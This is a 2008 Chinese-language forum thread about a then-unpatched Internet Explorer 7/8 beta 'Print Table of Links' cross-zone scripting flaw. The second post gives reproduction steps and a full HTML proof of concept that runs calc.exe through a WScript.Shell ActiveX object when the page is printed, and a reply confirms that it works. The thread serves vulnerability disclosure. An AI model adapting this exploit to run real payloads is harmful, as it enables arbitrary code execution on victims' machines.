51CTO技术论坛 » 网络安全 » Internet Explorer 7/8b 0day攻击代码出现        上一帖     下一帖    查看完整版本 页: [1] SimpleLove 2008-5-17 05:08 Internet Explorer 7/8b 0day攻击代码出现 安全研究人员Nate McFeters公布了一个IE7/8 Beta的0day漏洞,这一漏洞对XP有效,属于跨区域脚本漏洞,主要发生于本地区域和Internet区域的网页读取时. 目前这一漏洞没有被修补,并可以影响许多程序,包括Azureus,uTorrent,Eclipse平台等. [b]查看:[/b][url=http://blogs.zdnet.com/security/?p=1101]Aviv Raff drops an 0-day for IE 7.0 and 8.0b on XP[/url] SimpleLove 2008-5-17 05:14 MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability 具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx 如果启用了 "Print Table of Links"，在打印一个网页的时候，能够导致执行任意代码，当然VISTA上UAC可以拦截它 :) 重现： 1.下面这个地方打上勾 [img]http://www.neeao.com/blog/attachments/200805/14_231850_a.jpg[/img] 2.把下面代码保存成HTML，用IE打开，打印之，calc.exe会弹出。 （也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html） [code] <html> <body> Print me with table of links to execute calc.exe <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a> <script>window.print();</script> </body> </html> [/code] hackersea 2008-5-17 13:09 测试过了，是真的.. bing_1980 2008-5-19 03:51 全英文的  不想看太难理解了 关键词： c       2008        相关文章： [提问]有没有给予积分的机制? 卷心菜 德国蔬菜之王(图) 服务器崩溃,如何进行邮箱恢复? 防火墙基础知识详解 帮帮堂申请友情链接 查看完整版本: Internet Explorer 7/8b 0day攻击代码出现 Powered by 51CTO.COM